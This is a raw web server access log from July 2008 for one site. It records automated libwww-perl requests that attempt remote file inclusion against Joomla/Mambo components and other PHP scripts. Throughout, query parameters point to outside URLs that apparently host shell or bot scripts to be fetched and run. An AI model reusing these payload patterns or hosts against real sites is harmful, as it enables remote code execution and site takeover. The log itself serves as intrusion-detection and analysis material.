213.189.9.11 - - [06/Jul/2008:09:17:02 -0700] "GET /logs/access_080312.log/include/livre_include.php?no_connect=lol&chem_absolu=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.189.9.11 - - [06/Jul/2008:09:17:02 -0700] "GET /logs/access_080312.log/include/livre_include.php?no_connect=lol&chem_absolu=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.189.9.11 - - [06/Jul/2008:09:17:02 -0700] "GET /include/livre_include.php?no_connect=lol&chem_absolu=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.189.9.11 - - [06/Jul/2008:09:17:02 -0700] "GET /include/livre_include.php?no_connect=lol&chem_absolu=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.189.9.11 - - [06/Jul/2008:09:17:03 -0700] "GET /logs/include/livre_include.php?no_connect=lol&chem_absolu=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.189.9.11 - - [06/Jul/2008:09:17:03 -0700] "GET /logs/include/livre_include.php?no_connect=lol&chem_absolu=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.124.198.62 - - [06/Jul/2008:09:17:03 -0700] "GET /logs/access_080118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.124.198.62 - - [06/Jul/2008:09:17:03 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.124.198.62 - - [06/Jul/2008:09:17:03 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
62.116.167.49 - - [06/Jul/2008:09:17:26 -0700] "GET /home.php?x=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.17.56.7 - - [06/Jul/2008:09:17:33 -0700] "GET /logs/access_080312.log/include/livre_include.php?no_connect=lol&chem_absolu=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.56.7 - - [06/Jul/2008:09:17:34 -0700] "GET /include/livre_include.php?no_connect=lol&chem_absolu=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.56.7 - - [06/Jul/2008:09:17:34 -0700] "GET /logs/include/livre_include.php?no_connect=lol&chem_absolu=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:09:17:35 -0700] "GET /logs/access_080120.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.251.223.180 - - [06/Jul/2008:09:17:38 -0700] "GET /logs/access_080207.log/port.php?content=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.251.223.180 - - [06/Jul/2008:09:17:39 -0700] "GET /logs/port.php?content=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.137.51 - - [06/Jul/2008:09:17:42 -0700] "GET /logs/access_080207.log/index1.php?choix=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.137.51 - - [06/Jul/2008:09:17:45 -0700] "GET /logs/access.log/index1.php?choix=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.249.0.39 - - [06/Jul/2008:09:17:55 -0700] "GET ///components/com_jd-wp/wp-comments-post.php?mosConfig_absolute_path=http://c3media.net/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.137.51 - - [06/Jul/2008:09:17:56 -0700] "GET /logs/index1.php?menu=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.137.51 - - [06/Jul/2008:09:17:56 -0700] "GET /index1.php?menu=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.238.195.13 - - [06/Jul/2008:09:17:58 -0700] "GET /logs/access_080329.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.homeimmobiliare.eu/images/banners/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.83.0.42 - - [06/Jul/2008:09:18:02 -0700] "GET /logs/access_071224.log/index.php?content=http://www.proostjes.be/calendar/help01.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.83.0.42 - - [06/Jul/2008:09:18:02 -0700] "GET /logs/index.php?content=http://www.proostjes.be/calendar/help01.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.83.0.42 - - [06/Jul/2008:09:18:04 -0700] "GET /index.php?content=http://www.proostjes.be/calendar/help01.txt???? HTTP/1.1" 200 18431 "-" "libwww-perl/5.805" "www.dmulk.com"
213.189.9.11 - - [06/Jul/2008:09:18:08 -0700] "GET /logs/access_080312.log/include/livre_include.php?no_connect=lol&chem_absolu=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.189.9.11 - - [06/Jul/2008:09:18:09 -0700] "GET /include/livre_include.php?no_connect=lol&chem_absolu=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.189.9.11 - - [06/Jul/2008:09:18:09 -0700] "GET /logs/include/livre_include.php?no_connect=lol&chem_absolu=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
83.206.255.17 - - [06/Jul/2008:09:18:10 -0700] "GET /logs/access_080120.log HTTP/1.0" 200 585838 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
88.247.50.50 - - [06/Jul/2008:09:18:11 -0700] "GET /logs/access_080120.log HTTP/1.0" 200 458752 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
207.44.230.33 - - [06/Jul/2008:09:18:30 -0700] "GET /logs/access_080507.log//main.php?pagina=http://www.letstalkrecipes.com/templates/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.230.33 - - [06/Jul/2008:09:18:30 -0700] "GET /logs/access_080507.log//main.php?pagina=http://www.letstalkrecipes.com/templates/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.230.33 - - [06/Jul/2008:09:18:31 -0700] "GET //main.php?pagina=http://www.letstalkrecipes.com/templates/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.230.33 - - [06/Jul/2008:09:18:31 -0700] "GET //main.php?pagina=http://www.letstalkrecipes.com/templates/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.230.33 - - [06/Jul/2008:09:18:31 -0700] "GET /logs//main.php?pagina=http://www.letstalkrecipes.com/templates/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.230.33 - - [06/Jul/2008:09:18:31 -0700] "GET /logs//main.php?pagina=http://www.letstalkrecipes.com/templates/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
129.70.142.34 - - [06/Jul/2008:09:18:36 -0700] "GET /logs/access_080130.log HTTP/1.1" 200 196608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
74.53.178.146 - - [06/Jul/2008:09:18:40 -0700] "GET /logs/access_080312.log/includes/db_connect.php?baseDir=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.234.200.150 - - [06/Jul/2008:09:18:46 -0700] "GET /logs/access_080322.log//modules/vwar/admin/admin.php?vwar_root=http://tugaspeed.info/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.124.198.62 - - [06/Jul/2008:09:19:00 -0700] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:09:19:03 -0700] "GET /logs/access_071219.log/:/components/errors.php?error=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.116.167.49 - - [06/Jul/2008:09:19:03 -0700] "GET /logs/home.php?x=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.116.167.49 - - [06/Jul/2008:09:19:04 -0700] "GET /home.php?x=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:09:19:07 -0700] "GET /logs/access_071219.log//components/errors.php?error=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.78.40.57 - - [06/Jul/2008:09:19:08 -0700] "GET /logs/access.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.letstalkrecipes.com/templates/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.218.137.34 - - [06/Jul/2008:09:19:10 -0700] "GET /logs/access_080312.log/include/livre_include.php?no_connect=lol&chem_absolu=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
203.158.221.227 - - [06/Jul/2008:09:19:10 -0700] "GET /logs/access_080130.log HTTP/1.1" 200 327680 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
213.218.137.34 - - [06/Jul/2008:09:19:10 -0700] "GET /include/livre_include.php?no_connect=lol&chem_absolu=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.78.40.57 - - [06/Jul/2008:09:19:10 -0700] "GET /logs/access_080507.log//main.php?pagina=http://www.letstalkrecipes.com/templates/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.78.40.57 - - [06/Jul/2008:09:19:11 -0700] "GET //main.php?pagina=http://www.letstalkrecipes.com/templates/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.218.137.34 - - [06/Jul/2008:09:19:11 -0700] "GET /logs/include/livre_include.php?no_connect=lol&chem_absolu=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.78.40.57 - - [06/Jul/2008:09:19:11 -0700] "GET /logs//main.php?pagina=http://www.letstalkrecipes.com/templates/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.116.167.49 - - [06/Jul/2008:09:19:11 -0700] "GET /logs/home.php?x=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.116.167.49 - - [06/Jul/2008:09:19:11 -0700] "GET /home.php?x=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.78.40.57 - - [06/Jul/2008:09:19:14 -0700] "GET /logs/access_080507.log//main.php?pagina=http://www.letstalkrecipes.com/templates/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.78.40.57 - - [06/Jul/2008:09:19:14 -0700] "GET //main.php?pagina=http://www.letstalkrecipes.com/templates/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.78.40.57 - - [06/Jul/2008:09:19:14 -0700] "GET /logs//main.php?pagina=http://www.letstalkrecipes.com/templates/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.78.40.57 - - [06/Jul/2008:09:19:25 -0700] "GET /logs/access.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.letstalkrecipes.com/templates/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.218.137.34 - - [06/Jul/2008:09:19:26 -0700] "GET /logs/access_080312.log/include/livre_include.php?no_connect=lol&chem_absolu=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.218.137.34 - - [06/Jul/2008:09:19:27 -0700] "GET /include/livre_include.php?no_connect=lol&chem_absolu=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.218.137.34 - - [06/Jul/2008:09:19:27 -0700] "GET /logs/include/livre_include.php?no_connect=lol&chem_absolu=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.78.40.57 - - [06/Jul/2008:09:19:29 -0700] "GET /logs/access.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.letstalkrecipes.com/templates/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [06/Jul/2008:09:19:54 -0700] "GET /logs/access_080117.log/index1.php?=http://www.vanderjagt-kraanverhuur.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.78.40.57 - - [06/Jul/2008:09:19:56 -0700] "GET /logs/access_080507.log//main.php?pagina=http://www.letstalkrecipes.com/templates/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.78.40.57 - - [06/Jul/2008:09:19:56 -0700] "GET //main.php?pagina=http://www.letstalkrecipes.com/templates/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.78.40.57 - - [06/Jul/2008:09:19:56 -0700] "GET /logs//main.php?pagina=http://www.letstalkrecipes.com/templates/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.219.232.65 - - [06/Jul/2008:09:20:00 -0700] "GET /home.php?x=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.123.68.13 - - [06/Jul/2008:09:20:12 -0700] "GET /logs/access.log/admin/home/index.php?x=http://www.st-pieter.be/~sjc/contactdigitaal/core/ec? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.151.161.240 - - [06/Jul/2008:09:20:14 -0700] "GET /logs/access_080215.log/inc.php?inc=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.151.161.240 - - [06/Jul/2008:09:20:14 -0700] "GET /inc.php?inc=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.151.161.240 - - [06/Jul/2008:09:20:15 -0700] "GET /logs/inc.php?inc=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.251.223.180 - - [06/Jul/2008:09:20:26 -0700] "GET /logs/access_080215.log/port.php?content=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:09:20:32 -0700] "GET /logs/access_080207.log//components/errors.php?error=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:09:20:35 -0700] "GET /logs/access_080507.log/home.php?x=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:09:20:35 -0700] "GET /home.php?x=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:09:20:35 -0700] "GET /logs/home.php?x=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:09:20:36 -0700] "GET /logs/access_080207.log/:/components/errors.php?error=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:09:20:36 -0700] "GET //components/errors.php?error=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:09:20:38 -0700] "GET /logs//components/errors.php?error=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:09:20:40 -0700] "GET /:/components/errors.php?error=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:09:20:42 -0700] "GET /logs/:/components/errors.php?error=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.68.17 - - [06/Jul/2008:09:20:43 -0700] "GET /logs/access_071230.log//index.php?lang=en&page=http://pemlk.iespana.es/tools/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.68.17 - - [06/Jul/2008:09:20:46 -0700] "GET //index.php?lang=en&page=http://pemlk.iespana.es/tools/safe.txt? HTTP/1.1" 200 18423 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.68.17 - - [06/Jul/2008:09:20:47 -0700] "GET /logs//index.php?lang=en&page=http://pemlk.iespana.es/tools/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.49.13.112 - - [06/Jul/2008:09:20:49 -0700] "GET /logs/middle.php?file=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.49.13.112 - - [06/Jul/2008:09:20:54 -0700] "GET /middle.php?file=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.198.175.18 - - [06/Jul/2008:09:20:55 -0700] "GET /logs/access_080318.log/index.php?classified_path=http://www.vanderjagt-kraanverhuur.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:09:21:01 -0700] "GET /logs/access_080507.log/home.php?x=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:09:21:01 -0700] "GET /home.php?x=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:09:21:02 -0700] "GET /logs/home.php?x=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.94.56.40 - - [06/Jul/2008:09:21:03 -0700] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1.ripway.com/deaddevil/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:09:21:14 -0700] "GET /logs/access_080329.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://datteln-online.com/event/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:09:21:15 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://datteln-online.com/event/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:09:21:15 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://datteln-online.com/event/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
83.19.39.162 - - [06/Jul/2008:09:21:30 -0700] "GET /logs/access_080118.log//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://queb3.info/cruise/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.19.39.162 - - [06/Jul/2008:09:21:31 -0700] "GET //chat/inc/cmses/aedating4CMS.php?dir[inc]=http://queb3.info/cruise/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.19.39.162 - - [06/Jul/2008:09:21:31 -0700] "GET /logs//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://queb3.info/cruise/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.251.223.180 - - [06/Jul/2008:09:21:43 -0700] "GET /logs/access_080507.log/index2.php?url_page=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.251.223.180 - - [06/Jul/2008:09:21:43 -0700] "GET /logs/index2.php?url_page=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.24.133.93 - - [06/Jul/2008:09:21:59 -0700] "GET /logs/access_080507.log/home.php?x=http://www.creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.24.133.93 - - [06/Jul/2008:09:22:00 -0700] "GET /logs/home.php?x=http://www.creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.143.162 - - [06/Jul/2008:09:22:00 -0700] "GET /logs/errors.php?error=http://lipno.org/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.125.143.162 - - [06/Jul/2008:09:22:00 -0700] "GET /errors.php?error=http://lipno.org/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.19.39.162 - - [06/Jul/2008:09:22:01 -0700] "GET /logs/access.log/errors.php?error=http://queb3.info/cruise/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.19.39.162 - - [06/Jul/2008:09:22:01 -0700] "GET /errors.php?error=http://queb3.info/cruise/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.19.39.162 - - [06/Jul/2008:09:22:02 -0700] "GET /logs/errors.php?error=http://queb3.info/cruise/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.168.33.226 - - [06/Jul/2008:09:22:05 -0700] "GET /logs///components/com_flyspray/startdown.php?file=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.168.33.226 - - [06/Jul/2008:09:22:05 -0700] "GET ///components/com_flyspray/startdown.php?file=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.251.223.180 - - [06/Jul/2008:09:22:06 -0700] "GET /logs/access_080215.log//modules/vwar/admin/admin.php?vwar_root=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.219.232.65 - - [06/Jul/2008:09:22:20 -0700] "GET /logs/home.php?x=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.219.232.65 - - [06/Jul/2008:09:22:20 -0700] "GET /home.php?x=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.219.232.65 - - [06/Jul/2008:09:22:20 -0700] "GET /logs/home.php?x=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.219.232.65 - - [06/Jul/2008:09:22:21 -0700] "GET /home.php?x=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.116.167.49 - - [06/Jul/2008:09:22:26 -0700] "GET /logs/access_080507.log/home.php?x=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.116.167.49 - - [06/Jul/2008:09:22:26 -0700] "GET /home.php?x=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.116.167.49 - - [06/Jul/2008:09:22:27 -0700] "GET /logs/home.php?x=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.75.225.10 - - [06/Jul/2008:09:22:37 -0700] "GET /logs/access_080117.log/index1.php?=http://h1.ripway.com/keynet/bot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.179.18 - - [06/Jul/2008:09:22:50 -0700] "GET /logs/access_080118.log//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.nmla.org/lang.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.179.18 - - [06/Jul/2008:09:22:50 -0700] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.nmla.org/lang.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.179.18 - - [06/Jul/2008:09:22:50 -0700] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.nmla.org/lang.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
222.251.223.180 - - [06/Jul/2008:09:23:27 -0700] "GET /logs/access_080313.log/index1.php?x=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.251.223.180 - - [06/Jul/2008:09:23:28 -0700] "GET /logs/index1.php?x=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.64.164 - - [06/Jul/2008:09:23:29 -0700] "GET /logs/access.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.secondhandshop55.de/content//contenido/classes/updates? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.64.164 - - [06/Jul/2008:09:23:29 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.secondhandshop55.de/content//contenido/classes/updates? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.64.164 - - [06/Jul/2008:09:23:30 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.secondhandshop55.de/content//contenido/classes/updates? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
